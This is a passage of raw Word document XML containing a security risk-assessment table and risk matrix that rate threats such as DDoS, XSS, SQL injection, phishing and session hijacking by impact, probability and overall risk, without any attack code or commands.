            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Probability (1-3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0711EDAB" w14:textId="564B2D32" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F935E5" w14:paraId="74749BA1" w14:textId="55D76F98" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="842"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63055953" w14:textId="424B507C" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F40A0DD" w14:textId="7E5258DE" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Financial damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D6824B6" w14:textId="5DDE7E0B" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Very High (5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F553F92" w14:textId="628F2612" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low (1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44E0F615" w14:textId="43069918" w:rsidR="00F935E5" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F935E5" w14:paraId="4535831D" w14:textId="054D51A2" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="694"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3883564A" w14:textId="3403D20C" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="219236D1" w14:textId="562D5FF5" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Customer damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="014DB2EA" w14:textId="3E7BCD34" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CD57D52" w14:textId="127043C1" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Average (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02416AB4" w14:textId="4B1417DE" w:rsidR="00F935E5" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F935E5" w14:paraId="09FF7C2F" w14:textId="22A72D5F" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="987"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F3CA16" w14:textId="4354E8D7" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Dropping the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="139C885C" w14:textId="40BFEC9A" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7727E724" w14:textId="69BE69EA" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Very High (5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DB5959" w14:textId="7155F855" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low (1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02844EEA" w14:textId="5CE48D44" w:rsidR="00F935E5" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F935E5" w14:paraId="04AF320C" w14:textId="28D4105F" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="714"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="294BCA2D" w14:textId="5392A2A1" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00846024">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL Injection Attack.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B97F58A" w14:textId="1B5C589B" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FB39D20" w14:textId="43423ECC" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="589FC757" w14:textId="55776411" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A84CA2E" w14:textId="5FBAE229" w:rsidR="00F935E5" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F935E5" w14:paraId="704E380D" w14:textId="034D2400" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="880"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="501F96E1" w14:textId="44CD70B0" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66EC0922" w14:textId="49516283" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Physical damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08273D90" w14:textId="7A63787A" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6471797A" w14:textId="46954031" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Average (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="416ACCF2" w14:textId="25D60B5C" w:rsidR="00F935E5" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F935E5" w14:paraId="00308E19" w14:textId="39453B8E" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="884"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03C938CC" w14:textId="38598FAA" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00846024">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Session Hijacking and Man-in-the-Middle Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59949724" w14:textId="37131AE1" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Customer damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34772049" w14:textId="2C7AA538" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High (4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="591E730D" w14:textId="7DA7DCFA" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low (1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="300A86B0" w14:textId="3FD68FBA" w:rsidR="00F935E5" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DB75AB0" w14:textId="1C360093" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF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B5F19" w14:paraId="3B9D3D26" w14:textId="77777777" w:rsidTr="00AB5F19">
        <w:trPr>
          <w:trHeight w:val="961"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="291009C0" w14:textId="4DB9B2AF" w:rsidR="00AB5F19" w:rsidRPr="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB5F19">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Very likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6752D9B9" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="606941E7" w14:textId="4F782E54" w:rsidR="00AB5F19" w:rsidRPr="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005669E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL Injection Attack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70777947" w14:textId="5B121981" w:rsidR="005669E8" w:rsidRDefault="005669E8" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3274884A" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB5F19" w14:paraId="4EECC6C7" w14:textId="77777777" w:rsidTr="00AB5F19">
        <w:trPr>
          <w:trHeight w:val="965"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A3FB279" w14:textId="496D23C7" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB5F19">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18AE935E" w14:textId="290EAA54" w:rsidR="00AB5F19" w:rsidRPr="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0899A9BF" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005669E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B921CDF" w14:textId="77777777" w:rsidR="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C583498" w14:textId="0D3A1739" w:rsidR="005669E8" w:rsidRPr="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EE694F1" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB5F19" w14:paraId="75190440" w14:textId="77777777" w:rsidTr="00AB5F19">
        <w:trPr>
          <w:trHeight w:val="1111"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C92A957" w14:textId="4B85BD70" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB5F19">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="517761C5" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BEEA372" w14:textId="3F384618" w:rsidR="00AB5F19" w:rsidRPr="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005669E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Session Hijacking and Man-in-the-</w:t>
            </w:r>
            <w:r w:rsidRPr="005669E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Middle Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CDD4398" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005669E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>DDoS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D01474C" w14:textId="1218C5A3" w:rsidR="005669E8" w:rsidRPr="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Dropping Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB5F19" w14:paraId="4921391D" w14:textId="77777777" w:rsidTr="00AB5F19">
        <w:trPr>
          <w:trHeight w:val="1116"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BC4FCB1" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F1EEC71" w14:textId="323AEEDF" w:rsidR="00AB5F19" w:rsidRPr="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB5F19">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5061723B" w14:textId="44B48EDF" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB5F19">
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="456830B4" w14:textId="5DB4503C" w:rsidR="00AB5F19" w:rsidRPr="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
